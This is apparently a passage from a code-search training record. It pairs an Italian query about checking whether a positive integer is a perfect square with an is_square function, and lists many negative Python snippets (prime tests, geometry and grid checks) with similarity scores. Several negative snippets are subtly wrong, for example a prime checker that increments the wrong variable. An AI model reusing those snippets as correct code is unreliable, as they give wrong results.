any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\n # otherwise\n return not any(_try_composite(a, d, n, s)\n for a in _known_primes[:_precision_for_huge_n])\n\n def trial_division(n):\n if n < 2:\n return False\n if n < 4:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n limit = int(math.sqrt(n))\n divisor = 5\n\n while divisor <= limit:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n return False\n divisor += 6\n\n return True\n\n if 30000000 < n < 341550071728321:\n return mr(n)\n else:\n return trial_division(n)", "def isPrime(n):\n if n == 1:\n return False\n elif n < 4:\n return True\n elif n % 2 == 0:\n return False\n elif n < 9:\n return True\n elif n % 3 == 0:\n return False\n else:\n r = int(floor(sqrt(n)))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f+2) == 0: return False\n f += 6\n return True", "def prime_checker(num):\n\n assert num > 0\n\n if num < 2:\n return False\n\n if num == 2:\n return True\n\n if num % 2 == 0:\n return False\n\n n = 3\n\n while n * n <= num:\n\n if num % n == 0:\n return False\n\n else:\n num += 2\n\n return True", "def is_prime(num):\n if is_even(num) and num != 2 or num == 1:\n return False\n\n for dd in range(3, int(mt.sqrt(num)) + 1):\n if num % dd == 0:\n return False\n\n return True", "def is_prime_by_python(num):\n if num == 2:\n return True\n elif num % 2 == 0 or num <= 1:\n # even or smaller then one\n return False\n else:\n res = True\n partial_num_range = int(num / 4) + 1\n\n for i in range(1, partial_num_range):\n if num % (2 * i + 1) == 0:\n res = False\n break\n return res", "def is_prime(num: int) -> bool:\n return factorial(num - 1) % num != 0", "def is_prime(number):\n #for i in range(2, ceil(sqrt(number))):\n for i in range(2, number):\n if number % i == 0:\n return False\n return True", "def is_prime(num):\n for x in range(2, num + 1):\n if num % x == 0:\n return False\n return True", "def is_prime(n):\n\tb = 2\n\twhile b <= math.sqrt(n):\n\t\tif n % b == 0:\n\t\t\treturn False\n\t\tb += 1\n\treturn True", "def prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def primes_less(n):\n test_nums = list(range(3, int(floor(sqrt(n))), 2))\n prime_flags = [True] * ((n - 2) // 2)\n for a in test_nums:\n next_div = a**2\n while next_div < n:\n prime_flags[(next_div-3)//2] = False\n next_div += 2*a\n return [2] + [2*i + 3 for i, flag in enumerate(prime_flags) if flag]", "def is_prime_number(number_):\n flag = 0\n for values in range(2, number_//2):\n if number_ % values == 0:\n flag += 1\n if flag == 1:\n return True\n else:\n return False" ]
[ "0.7530166", "0.7529172", "0.74141574", "0.7411982", "0.74033934", "0.7400811", "0.73903537", "0.7340318", "0.7339235", "0.7208471", "0.72076946", "0.71999794", "0.71911615", "0.7184746", "0.7175246", "0.71705663", "0.7161727", "0.71484905", "0.714309", "0.7138867", "0.7132576", "0.7129523", "0.71263534", "0.71098995", "0.7102168", "0.7086541", "0.7085513", "0.70756024", "0.7065586", "0.70587444", "0.70583105", "0.7057649", "0.70485735", "0.70368147", "0.7027998", "0.7018291", "0.7017022", "0.7013822", "0.7011501", "0.7010394", "0.7008339", "0.7005505", "0.70054156", "0.70030916", "0.700149", "0.7001393", "0.6985533", "0.6985533", "0.6980595", "0.6965383", "0.6961769", "0.69615954", "0.69595736", "0.6952772", "0.6951281", "0.6945838", "0.6945572", "0.6935624", "0.69321316", "0.69278765", "0.6927555", "0.6919923", "0.6909959", "0.6908562", "0.6907119", "0.68926406", "0.6888096", "0.6886029", "0.6885846", "0.6879229", "0.6872747", "0.68700576", "0.68693453", "0.6867306", "0.68663704", "0.6863135", "0.6858584", "0.6852262", "0.68442523", "0.6842027", "0.6840461", "0.68315387", "0.6828364", "0.6825707", "0.6822819", "0.6820611", "0.6814864", "0.681463", "0.6806338", "0.6798312", "0.67857236", "0.6784974", "0.67826074", "0.6772027", "0.6768934", "0.6767242", "0.67667156", "0.67649543", "0.67579836", "0.6751628", "0.6746886" ]
0.0
-1
Verifica che un intero positivo sia un quadrato
def is_square(apositiveint): x = apositiveint // 2 seen = set([x]) while x * x != apositiveint: x = (x + (apositiveint // x)) // 2 if x in seen: return False seen.add(x) return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def quadrant(xcoord, ycoord):\n\n xneg = bool(xcoord < 0)\n yneg = bool(ycoord < 0)\n if xneg is True:\n if yneg is False:\n return 2\n return 3\n if yneg is False:\n return 1\n return 4", "def _point_in_tri(self, pos, tri):\n signs = np.sign([np.cross(tri[np.mod(i + 1, 3)] - tri[i],\n pos - tri[i]) for i in range(3)])\n if np.all(signs[1:] == signs[0]):\n return True\n else:\n return False", "def quadrant(pAx, pAy, pBx, pBy):\n###############################################################################\n\n if (pBx>pAx and pBy>pAy):\n return 1\n elif (pBx<pAx and pBy>pAy):\n return 2\n elif (pBx<pAx and pBy<pAy):\n return 3\n elif (pBx>pAx and pBy<pAy):\n return 4\n else:\n return 0", "def quadrant(point_x, point_y):\n if point_x == 0 and point_y == 0:\n print \"O\n \"\n elif point_x == 0 and (point_y < 0 or point_y > 0):\n print \"Y\"\n elif point_y == 0 and (point_x < 0 or point_x > 0):\n print \"X\"\n elif point_x > 0 and point_y > 0:\n print \"Q1\"\n elif point_x < 0 and point_y > 0:\n print \"Q2\"\n elif point_x < 0 and point_y < 0:\n print \"Q3\"\n elif point_x > 0 and point_y < 0:\n print \"Q4\"", "def check_quadline(self, row: int, col: int, drow: int, dcol: int) -> bool:\n count = 1\n token = self.get_token(row, col)\n count_token = 1\n while self.check_bounds(row+drow, col+dcol) and count <= 3:\n if self.grid[row+drow][col+dcol] == token:\n row += drow\n col += dcol\n count_token += 1\n if count_token == 4:\n return True\n count += 1\n return False", "def test(p):\n while p.quadrant() != TOP_RIGHT_QUAD:\n if p.x < 0:\n p = p.reflect_y()\n else:\n p = p.reflect_x()\n return p", "def is_lower_triangular(self):\n self.check_square()\n\n for i in range(self.rows):\n for j in range(i+1, self.rows):\n if self[i, j] != 0:\n return False\n return True", "def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8", "def continuous(self, x, y, X, Y):\n hor = fabs(x - X) == SSIZE and y == Y\n ver = fabs(y - Y) == SSIZE and x == X\n return (hor and not ver) or (ver and not hor)", "def is_valid_cord(x, y, w, h):\n return x >=0 and x < w and y >= 0 and y < h;", "def is_triangle(x):\n solution = solve_quad(1, 1, -2*x)\n return max(solution) % 1 == 0", "def inside(self, p: PointType, q: PointType) -> bool:\n\n # XXX re-implement with ccw and a list of points instead of a pair\n\n i = min(p.x, q.x) < self.x < max(p.x, q.x)\n j = min(p.y, q.y) < self.y < max(p.y, q.y)\n\n return i and j", "def test_single_quadrant(self):", "def within(point: tuple, box: tuple) -> bool:\r\n \r\n return box[0] < point[0] < box[2] and box[1] < point[1] < box[3]", "def is_pentagonal(x):\n solution = solve_quad(3, -1, -2*x)\n return max(solution) % 1 == 0", "def coordinates_within_board(n: int, x: int, y: int) -> bool:\n\n return x < n and y < n and x >= 0 and y >= 0", "def check(self,a,x,y):\r\n return not self.exitsinrow(self.rows,x,a) and not self.existsincol(self.rows,y,a) and \\\r\n not self.exitsinblock(self.rows, x - x % 3, y - y % 3,a)", "def valid(a,b,x,y):\n\t# Size of the square grid that encases rectagle x,y\n\tsquare = x + y - 2\n\t# Taxi cab distance (no diagonals) from (p_a, p_b) to (a,b)\n\tsteps = lambda p_a, p_b: abs(p_a - a) + abs(p_b - b)\n\t# Top/Bottom/Left/Right bound\n\tif min(a,b) < 0 or max(a,b) >= square: return False\n\t# Upper left/Lower right corner check\n\tif steps(0,0) < (x - 2) or steps(square - 1, square - 1) < (x - 2): return False \n\t# Lower left/Upper right corner check\n\telif steps(square - 1, 0) < (y - 2) or steps( 0, square - 1) < (y - 2): return False\n\treturn True", "def inrange(cc, point):\n return point.row in range(cc.top, cc.bottom+1) and point.col in range(cc.left, cc.right+1)", "def check_infinite(coord, sides, coordinates):\n return is_border(coord, sides)\\\n and coord not in coordinates\\\n and (\\\n (coord[0]+1, coord[1]) not in coordinates and (coord[0]-1, coord[1]) not in coordinates\\\n or (coord[0], coord[1]+1) not in coordinates and (coord[0], coord[1]-1) not in coordinates)", "def isInside(x1, y1, x2, y2, x3, y3, x, y):\n # Calculate area of triangle ABC\n A = area (x1, y1, x2, y2, x3, y3)\n \n # Calculate area of triangle PBC\n A1 = area (x, y, x2, y2, x3, y3)\n \n # Calculate area of triangle PAC\n A2 = area (x1, y1, x, y, x3, y3)\n \n # Calculate area of triangle PAB\n A3 = area (x1, y1, x2, y2, x, y)\n \n # Check if sum of A1, A2 and A3\n # is same as A\n if(A == A1 + A2 + A3):\n return True\n else:\n return False", "def get_quadrant(x, y):\n try:\n x = int(x)\n y = int(y)\n except ValueError:\n return (0)\n\n if y >= 0 and x > 0:\n return (1)\n elif y >= 0 and x < 0:\n return (2)\n elif y < 0 and x < 0:\n return (3)\n else:\n return (4)", "def is_upper_triangular(self):\n self.check_square()\n\n for i in range(self.rows):\n for j in range(i):\n if self[i, j] != 0:\n return False\n return True", "def is_quadline(self, col: int) -> bool:\n row = self.depth(col)\n for i in range(-1, 2):\n for j in range(-1, 2):\n if not (i == 0 and j == 0) and self.check_quadline(row, col,\n i, j):\n return True\n return False", "def test_case_05_not_legal_triangle(self):\n self.__assert_equals_test_case([(4, 6, 11)], 'NotATriangle')", "def test_triangle_positive_is_equilateral_property(self):\n a = Point(-9, 10)\n b = Point(-1, 4)\n c = Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7)\n t = Triangle(a, b, c)\n self.assertTrue(t.is_equilateral,\n \"Test of Triangle(Point(-9, 10), Point(-1, 4), Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7))\\\n failed, returned value != True.\")\n a = Point(-9, 21)\n b = Point(-1, 4)\n c = Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7)\n t = Triangle(a, b, c)\n self.assertFalse(t.is_equilateral,\n \"Test of Triangle(Point(-9, 21), Point(-1, 4), Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7))\\\n failed, returned value != False.\")", "def test_case_04_legal_triangle(self):\n self.__assert_not_equal_test_case([(4, 4, 8), (4, 5, 8)], 'NotATriangle')", "def check_inside(self, pos):\n x,y = pos\n return x >= self.posx and x <= self.posx + self.sizex and y >= self.posy and y <= self.posy + self.sizey", "def dans_cercle(self, r, x, y):\r\n self.r_num(r)\r\n valid = (isinstance(x, int) or isinstance(x, float)) and \\\r\n (isinstance(y, int) or isinstance(y, float))\r\n if valid:\r\n if sqrt(x**2+y**2)<self.r:\r\n return True\r\n else:\r\n return False\r\n else:\r\n raise TypeError", "def in_square(self, point):\n size = self.size\n centre = self.centre\n # Find the upper and lower bounds for the square in-terms of x and y\n lower_x, upper_x = centre.x - size / 2, centre.x + size / 2\n lower_y, upper_y = centre.y - size / 2, centre.y + size / 2\n # Equals with lower bounds only\n return (lower_x <= point.x < upper_x) and (lower_y < point.y <= upper_y)", "def in_line(pi, pj, pk):\n # compute cross product\n dxc = pk.x - pi.x;\n dyc = pk.y - pi.y;\n\n dxl = pj.x - pi.x;\n dyl = pj.y - pi.y;\n\n cross = dxc * dyl - dyc * dxl;\n\n return True if cross == 0 else False", "def tnuc_region_in_exon(np, beg, end):\n\n if beg.tpos != 0: return False\n if end.tpos != 0: return False\n for i in range(beg.pos, end.pos-1):\n if abs(np[i] - np[i+1]) != 1:\n return False\n return True", "def _inside(self, x, y):\n wx, wy, w, h = self._raw_graph_window_dim()\n if wx <= x < wx + w and wy <= y < wy + h:\n return True\n return False", "def _inside_isheating(ci, hi, co, ho) -> bool:\n return abs(298.15 - ci.T) - abs(hi.T - 298.15) > 0", "def near(self,x1,y1,x2,y2):\n if x1 - x2 >= -1 and x1 - x2 <= 1 and\\\n y1 - y2 >= -1 and y1 - y2 <= 1:\n return True\n else:\n return False", "def in_box(coords, box):\n if box[0][0] < coords[0] < box[1][0] and box[1][1] < coords[1] < box[0][1]:\n return True\n return False", "def is_in_field(self, x, y):\n return (self.origin_x <= x < self.width) and (self.origin_y <= y < self.height)", "def is_valid_index(x, y, l_matrix):\n return x < l_matrix and y < l_matrix and x > -1 and y > -1", "def in_box(coords, box):\n\tif box[0][0] < coords[0] < box[1][0] and box[1][1] < coords[1] < box[0][1]:\n\t\treturn True\n\treturn False", "def check_coord_in_range(self, x, y):\n return 0 <= x < self.cols and 0 <= y < self.lines", "def are_vertices_clockwise(self,line):\r\n \r\n import numpy as np\r\n \r\n signed_area = 0\r\n for idx in range(line.shape[0]):\r\n \r\n x1 = line[idx,0]\r\n y1 = line[idx,1]\r\n if idx == line.shape[0]-1:\r\n x2 = line[0,0]\r\n y2 = line[0,1]\r\n else:\r\n x2 = line[idx+1,0]\r\n y2 = line[idx+1,1]\r\n \r\n signed_area += (x1 * y2 - x2 * y1)\r\n \r\n return (np.sign(signed_area) == -1.)", "def are_vertices_clockwise(self,line):\r\n \r\n import numpy as np\r\n \r\n signed_area = 0\r\n for idx in range(line.shape[0]):\r\n \r\n x1 = line[idx,0]\r\n y1 = line[idx,1]\r\n if idx == line.shape[0]-1:\r\n x2 = line[0,0]\r\n y2 = line[0,1]\r\n else:\r\n x2 = line[idx+1,0]\r\n y2 = line[idx+1,1]\r\n \r\n signed_area += (x1 * y2 - x2 * y1)\r\n \r\n return (np.sign(signed_area) == -1.)", "def is_on_curve(self):\n if self.infinity:\n return True\n left = self.y * self.y\n right = self.x * self.x * self.x + self.ec.a * self.x + self.ec.b\n\n return left == right", "def checkintersection(p1,p2,p3,p4):\n def isonsegment(i,j,k):\n return ((i.x <= k.x or j.x <= k.x) and (k.x <= i.x or k.x <= j.x) and\n (i.y <= k.y or j.y <= k.y) and (k.y <= i.y or k.x <= j.y))\n\n def computedirection(i,j,k):\n a = (k.x - i.x) * (j.y - i.y);\n b = (j.x - i.x) * (k.y - i.y);\n if a < b:\n return -1\n elif a > b:\n return 1\n else:\n return 0\n\n # return no intersection if they\n if p1.x == p3.x and p1.y == p3.y:\n return False \n if p1.x == p4.x and p1.y == p4.y:\n return False\n if p2.x == p3.x and p2.y == p3.y:\n return False\n if p2.x == p4.x and p2.y == p4.y:\n return False\n\n\n d1 = computedirection(p3,p4,p1)\n d2 = computedirection(p3,p4,p2)\n d3 = computedirection(p1,p2,p3)\n d4 = computedirection(p1,p2,p4)\n return ((((d1 > 0 and d2 < 0) or (d1 < 0 and d2 > 0)) and\n ((d3 > 0 and d4 < 0) or (d3 < 0 and d4 > 0))) or\n (d1 == 0 and isonsegment(p3,p4,p1)) or\n (d2 == 0 and isonsegment(p3,p4,p2)) or\n (d3 == 0 and isonsegment(p1,p2,p3)) or\n (d4 == 0 and isonsegment(p1,p2,p4)))", "def isOnInteriorSide(self, v):\n n = self.normalVect()\n return n.dotProduct(vector(self.vertices[0]) - vector(v)) > 0", "def is_border(coord, sides):\n return coord[0] <= 0 or coord[0] >= sides[\"bottom\"]\\\n or coord[1] <= 0 or coord[1] >= sides[\"right\"]", "def isOutsideBorder(self):\n if (self.posX < -self.myGalaxy.worldWidth or self.posX > self.myGalaxy.worldWidth or\n self.posY < -self.myGalaxy.worldHeight or self.posY > self.myGalaxy.worldHeight):\n return 1\n return 0", "def is_inside(self, p):\n s, t = self.get_barycentric_coord(p)\n if 0 <= s <= 1 and 0 <= t <= 1 and s + t <= 1:\n return True\n else:\n return False", "def in_bounds(self, x, y):\n return x >= 0 and x < 8 and y >= 0 and y < 8", "def issquare(self):\r\n if self.width == self.height:\r\n return True\r\n else:\r\n return False", "def contains_point(self, x, y):\r\n if self.m == None:\r\n if abs(x - self.start[0]) > 0.6:\r\n return False\r\n else:\r\n if (y >= self.start[1] and y <= self.end[1]) or \\\r\n (y <= self.start[1] and y >= self.end[1]):\r\n return True\r\n else:\r\n return False\r\n else: \r\n y0 = int(self.m * x + self.n)\r\n if abs(y - y0) > 0.6: \r\n return False \r\n else: \r\n if ((x >= self.start[0] and x <= self.end[0]) or \\\r\n (x <= self.start[0] and x >= self.end[0])) and \\\r\n ((y >= self.start[1] and y <= self.end[1]) or \\\r\n (y <= self.start[1] and y >= self.end[1])): \r\n return True\r\n else:\r\n return False", "def is_valid_position(self, x, y):\n if (x > self.n_cols-1 or y > self.n_rows-1) or (x < 0 or y < 0):\n return False\n\n elif self.grid[x][y] == 3:\n return False\n\n return True", "def isIn(self, coor, rec):\n x, y = coor[0], coor[1]\n top, bottom, left, right = rec[1][1], rec[0][1], rec[0][0], rec[1][0]\n # print(top, bottom, left, right)\n if left <= x <= right and bottom <= y <= top:\n return True\n else:\n return False", "def is_origin(self) -> bool:\n return self.x == 0 and self.y == 0", "def within(self, x, y):\n return x >= self.top_x and x <= self.bottom_x and y >= self.bottom_y and y <= self.top_y", "def tnuc_region_in_intron(np, beg, end):\n\n if beg.tpos == 0 or end.tpos == 0: return False\n if beg.pos == end.pos and beg.tpos*end.tpos > 0:\n return True\n if beg.pos+1 == end.pos and beg.tpos>0 and end.tpos<0:\n return True\n if end.pos+1 == beg.pos and beg.tpos<0 and end.tpos>0:\n return True\n\n return False", "def square_boundaries(px , py, pz, incx, incy, incz, min_x, min_y, min_z, max_x, max_y, max_z):\n\n if px < min_x or px > max_x: \n pcx = px - incx \n\n if py < min_y or py > max_y:\n pcy = py - incy \n\n if pz < min_z or pz > max_z:\n pcz = pz - incz \n\n return pcx, pcy, pcz", "def onSegment(self, p, q, r):\n if ((q.x <= max(p.x, r.x)) and (q.x >= min(p.x, r.x)) and\n (q.y <= max(p.y, r.y)) and (q.y >= min(p.y, r.y))):\n return True\n return False", "def checkvalid(self,borad,row,col,n):\n # check the above column has 'Q'\n i=0\n while i!=row:\n if borad[i][col]=='Q':\n return False\n i+=1\n # check the left-top 135 and right-top 45\n i,j=row-1,col-1\n while i>=0 and j>=0:\n if borad[i][j]=='Q':\n return False\n i-=1\n j-=1\n \n i,j=row-1,col+1\n while i>=0 and j<n:\n if borad[i][j]=='Q':\n return False\n i-=1\n j+=1\n \n return True", "def right_of(self,v):\n x,y = v[0:2]\n if y < self.ylo: return False\n if y >= self.yhi: return False\n if x > self.xhi: return False\n if x > ((y * self.m) + self.b): return False\n return True", "def between(self, p: PointType, q: PointType) -> bool:\n\n i = min(p.x, q.x) <= self.x <= max(p.x, q.x)\n j = min(p.y, q.y) <= self.y <= max(p.y, q.y)\n\n return i and j", "def in_range(x, y):\n if (x < 0 or x > width or y < 0 or y > length):\n return False\n else:\n return True", "def validar_triangulo(a,b,c):\n if (a+b) > c and a+c > b:\n print('Es un triangulo')\n else:\n print('No es un triangulo')", "def _point_in_tris(self, pos, obj):\n these_tris = obj._tris['fill'].reshape(-1, 3)\n for tri in these_tris:\n if self._point_in_tri(pos, obj._points['fill'][tri]):\n return True\n return False", "def four_qs(self, xp, yp, c, val1, val2):\r\n xs, ys = c\r\n x = xs-xp\r\n y = ys-yp\r\n if (x == 0 and y >= 0) or (y==0 and x > 0):\r\n return val2\r\n elif x == 0 and y<0 or (y==0 and x <= 0):\r\n return val1\r\n else:\r\n pass\r\n phi = np.arctan(y/x)\r\n expr = (0 <= phi <= 0.5*np.pi) or (np.pi < phi < 1.5*np.pi)\r\n if expr: # pixel is in first or third quadrant\r\n return val2\r\n else: # pixel is in second or fourth quadrant\r\n return val1", "def valid_coordinates(self, x, y):\n return ((x >= 0) and (x < self.width) and\n (y >= 0) and (y < self.height))", "def isSquare(self, sides, player_positions):\n\t\tprint \"Inside isSquare!-----\"\n\t\tequalSide1 = -1\n\t\tequalSide2 = -1\n\t\tunequalSide = -1\n\t\tif(sides[0] == sides[1]):\n\t\t\tif(sides[0] != sides[2]):\n\t\t\t\tequalSide1 = 0\n\t\t\t\tequalSide2 = 1\n\t\t\t\tunequalSide = 2\n\t\telif(sides[1] == sides[2]):\n\t\t\tif(sides[1] != sides[0]):\n\t\t\t\tequalSide1 = 1\n\t\t\t\tequalSide2 = 2\n\t\t\t\tunequalSide = 0 \n\t\telif(sides[0] == sides[2]):\n\t\t\tif(sides[0] != sides[1]):\n\t\t\t\tequalSide1 = 0\n\t\t\t\tequalSide2 = 2\n\t\t\t\tunequalSide = 1\n\n\t\t\"\"\"\n\t\t\tIf failed to satisfy the above condition, the points doesn't form a square\n \t\tOtherwise check for the square distance conditions\n \t\"\"\"\n\t\tif(equalSide1 != -1):\n\t\t\topposing = 0\n\t\t\tif(unequalSide == 0):\n\t\t\t\topposing = self.distance(player_positions[2], player_positions[3]);\n\t\t\telif(unequalSide == 1):\n\t\t\t\topposing = self.distance(player_positions[1], player_positions[3]);\n\t\t\telif(unequalSide == 2):\n\t\t\t\topposing = self.distance(player_positions[1], player_positions[2]);\n\n\t\t\tif(opposing == sides[unequalSide]):\n\t\t\t\tdiagonal = opposing\n\t\t\t\tadjacent = sides[equalSide1]\n\t\t\t\tis_Square = True\n\t\t\t\tfor a in range(0,4):\n\t\t\t\t\tdiagonalCount = 0\n\t\t\t\t\tadjacentCount = 0 \n\t\t\t\t\tfor b in range(0,4):\n\t\t\t\t\t\tif(a != b):\n\t\t\t\t\t\t\tdistance1 = self.distance(player_positions[a], player_positions[b]);\n\t\t\t\t\t\t\tif(distance1 == diagonal):\n\t\t\t\t\t\t\t\tdiagonalCount += 1\n\t\t\t\t\t\t\telif(distance1 == adjacent):\n\t\t\t\t\t\t\t\tadjacentCount += 1\n\t\n\t\t\t\t\tif((diagonalCount == 1 and adjacentCount == 2) != True): #If there is one diagonal and two adjacents\n\t\t\t\t\t\tis_Square = False\n\t\t\t\t\t\tbreak;\n\t\t\t\tif(is_Square == True): #There is a square\n\t\t\t\t\treturn True\n\t\treturn False", "def p_in_tri(p, tri):\n tri = np.array(tri)\n\n x = p[0]\n y = p[1]\n\n x1 = tri[0, 0]\n y1 = tri[0, 1]\n\n x2 = tri[1, 0]\n y2 = tri[1, 1]\n\n x3 = tri[2, 0]\n y3 = tri[2, 1]\n\n a = ((y2 - y3) * (x - x3) + (x3 - x2) * (y - y3)) / ((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))\n b = ((y3 - y1) * (x - x3) + (x1 - x3) * (y - y3)) / ((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))\n c = 1 - a - b\n\n return (0 <= a <= 1) and (0 <= b <= 1) and (0 <= c <= 1)", "def is_solved(self):\n return self.from_grid == self.to_grid", "def is_solved(self):\n return self.from_grid == self.to_grid", "def is_solved(self):\n return self.from_grid == self.to_grid", "def is_valid_number(self):\n for condition in [self.game.getRow(self.pos), self.game.getCol(self.pos), self.game.getSquare(self.pos)]:\n if not self.check_alignement_condition(condition):\n return False\n return True", "def is_solved(self):\n return self.to_grid == self.from_grid", "def __ge__(self, other):\n return self.x ** 2 + self.y ** 2 >= other.x ** 2 + other.y ** 2", "def is_inside(self, x: int, y: int) -> bool:\n pass", "def is_at_intersection(self):\n directions = 0\n self.tile = (self.get_nearest_row(), self.get_nearest_col())\n if self.internal_map[self.tile[0] - 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0] + 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] - 1] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] + 1] not in ('x', ):\n directions += 1\n return True if directions > 2 else False", "def Q8_test():\n dispo = [False, True, True, False]\n tab_dist = [[0, 4.123105625617661, 4.242640687119285, 4.47213595499958], [4.123105625617661, 0, 4.123105625617661, 7.810249675906654], [4.242640687119285, 4.123105625617661, 0, 5.0990195135927845], [4.47213595499958, 7.810249675906654, 5.0990195135927845, 0]]\n return 1 == indice(0, tab_dist, dispo)", "def exsist_triangle(a: int, b: int, c: int):\n if a + b > c and a + c > b and b + c > a:\n print('Триугольник существует')\n if a == b == c:\n print('Триугольник равносторонний')\n elif a == b or a == c or b == c:\n print('Триугольник равнобедренный')\n else:\n print('Триугольник разносторонний')\n else:\n print('Триугольник не существует')", "def is_solved(self):\n return (self.from_grid == self.to_grid)", "def is_valid(row, peg):\n return (\n (row < TRI_SIZE) and\n (row >= 0) and\n (peg < TRI_SIZE) and\n (peg >= 0) and\n (peg <= row)\n )", "def is_curr_location_corner(game, player_location):\n corner_positions = [(0, 0), (0, game.height - 1), (game.width - 1, 0), (game.width - 1, game.height - 1)]\n return player_location in corner_positions", "def is_tri(n):\n tri_test = (-1 + sqrt(1 + 8*n))/2\n if tri_test == int(tri_test):\n return True\n return False", "def check_coordinates(X, Y):\n\n # Accounting for elliptical Jupiter disk\n Y *= 1.071374\n\n return sqrt(X ** 2 + Y ** 2)", "def is_cross(self, row, col):\n return self.field[row, col] == 'O'", "def tooTight(self, row, col, i, j):\n return self.distanceToGoal[row + i][col] == self.infinity or \\\n self.distanceToGoal[row][col + j] == self.infinity", "def colisiona(self, r, p):\n # Esta en el eje de las x?\n if p[0] >= r[0] and p[0] <= r[0] + 10:\n # Esta en el eje de las y?\n if p[1] >= r[1] and p[1] <= r[1] + 5:\n return True\n else:\n return False\n else:\n return False", "def is_ccw(a, b, c):\n p = b - a\n q = c - a\n area = p.x * q.y - q.x * p.y\n\t # May want to throw an exception if area == 0\n return area > 0", "def within(p, q, r):\r\n return p <= q <= r or r <= q <= p", "def contains(self, point):\n return 0 <= point.x <= 1 \\\n and 0 <= point.y <= 1 \\\n and 0 <= point.z <= 1", "def inside(i,j,im,h=H): #X\n return i-h >=0 and j-h >=0 and i+h+1<=im.shape[0] and j+h+1<=im.shape[1]", "def checkpsq(i):\n min=int(math.floor(math.sqrt(i)))\n max=int(math.ceil(math.sqrt(i)))\n if(i==min*min or i==max*max):\n return True", "def inRect(p,rect,dilation):\n if p[0]<rect[0]-dilation: return 0\n if p[1]<rect[1]-dilation: return 0\n if p[0]>rect[2]+dilation: return 0\n if p[1]>rect[3]+dilation: return 0\n return 1", "def test_sms_case_1(self):\n pt = (-31.459823375717541, 29.927133417260336, 0)\n\n pts = ((-20.150000000000002, 46.579999999999998, 7),\n (-41.100000000000001, 30.370000000000001, 8),\n (-19.550000000000001, 29.379999999999999, 9))\n tris = (2, 0, 1)\n\n tri_search = grid.geometry.TriSearch(pts, tris)\n\n self.assertEqual(0, tri_search.triangle_containing_point(pt))", "def box_valid(self):\n return ((self.lt.x >= 0)\n and (self.lt.y >= 0)\n and (self.rb.x >= self.lt.x)\n and (self.rb.y >= self.lt.y))", "def curvature_sanity(left_curvature, left_offset, right_curvature, right_offset):\n if return_queue_len(flag='L') >= 1 and return_queue_len(flag='R') >= 1:\n offset = center_position - (left_offset + right_offset) / 2.\n offset_measure = np.abs(overall_offset - offset)\n return True if offset_measure < 0.2 else False\n else:\n return True", "def testTriangleInequality(self):\n for profile1 in self.profiles:\n for profile2 in self.profiles:\n for profile3 in self.profiles:\n self.assertTrue(profile1.edit_distance(profile3) <= profile1.edit_distance(profile2) + profile2.edit_distance(profile3))", "def ispolygonXY(a):\n return ispolygon(a) and isXYPlanar(a)", "def check_2x2_solved(self):\n return self._grid[0][0] == 0 and self._grid[0][1] == 1 \\\n and self._grid[1][0] == self._width*1 and self._grid[1][1] == (1 + self._width * 1)", "def contains ( self, pos ):\n dr2 = (pos[0, :]-self.x)**2 + (pos[1, :]-self.y)**2\n # which points are in the circle?\n if self.include_border:\n inds = (dr2 - self.r**2) < self.abs_tol\n else:\n inds = (dr2 - self.r**2) < -self.abs_tol\n \n \n # if there's no poit inside\n if ~inds.any() and self.default_nearest: \n inds[argmin(dr2)] = True\n \n return inds", "def check_position(self, player):\n\n # Mid point of the segment defining the goal\n mid = Point.mid_point(self.s_pos, self.e_pos)\n\n # Transposition of this point by the direction vector of the goal\n # to get the direction vector with its origin in the center of the goal\n mid_prime = self.dir + mid\n\n # Creating both needed vectors\n v1 = Vector.v_from_pp(mid, player.pos)\n v2 = Vector.v_from_pp(mid, mid_prime)\n\n # Getting the angle and checking if it is a valid one\n angle = v1.angle(v2)\n\n return self.is_in_interval(-math.pi / 2, math.pi / 2, angle)", "def contains_point(self, x, y): \r\n n = len(self.points)\r\n inside = False\r\n \r\n x1, y1 = self.points[0]\r\n for i in range(n + 1):\r\n x2, y2 = self.points[i % n]\r\n if y > min(y1, y2):\r\n if y <= max(y1, y2):\r\n if x <= max(x1, x2):\r\n if y1 != y2:\r\n xinters = (y - y1) * (x2 - x1) / (y2 - y1) + x1\r\n if x1 == x2 or x <= xinters:\r\n inside = not inside\r\n x1, y1 = x2, y2\r\n \r\n return inside" ]
[ "0.7044399", "0.68214154", "0.67046845", "0.668237", "0.65902036", "0.6427196", "0.6391145", "0.637763", "0.6324196", "0.6229131", "0.6208887", "0.62083405", "0.61662257", "0.6166056", "0.61422956", "0.6140599", "0.6139746", "0.61388415", "0.6134873", "0.61307234", "0.611599", "0.6103065", "0.60957086", "0.6092551", "0.6088955", "0.6085997", "0.6073432", "0.60492045", "0.60358596", "0.60215306", "0.60074556", "0.60037297", "0.599743", "0.59950894", "0.599435", "0.59704083", "0.5957802", "0.5953584", "0.5953189", "0.5951961", "0.5939069", "0.5939069", "0.59389865", "0.5928242", "0.59156066", "0.59146726", "0.5912249", "0.59094286", "0.5909373", "0.590881", "0.5906373", "0.58972895", "0.5888805", "0.58746636", "0.58705425", "0.58683854", "0.5853479", "0.5845383", "0.5840414", "0.583487", "0.5831233", "0.58303857", "0.5825905", "0.58232296", "0.5822634", "0.5816353", "0.581559", "0.5811251", "0.5807074", "0.5807074", "0.5807074", "0.5796954", "0.5796285", "0.57938915", "0.5788318", "0.5787857", "0.5786951", 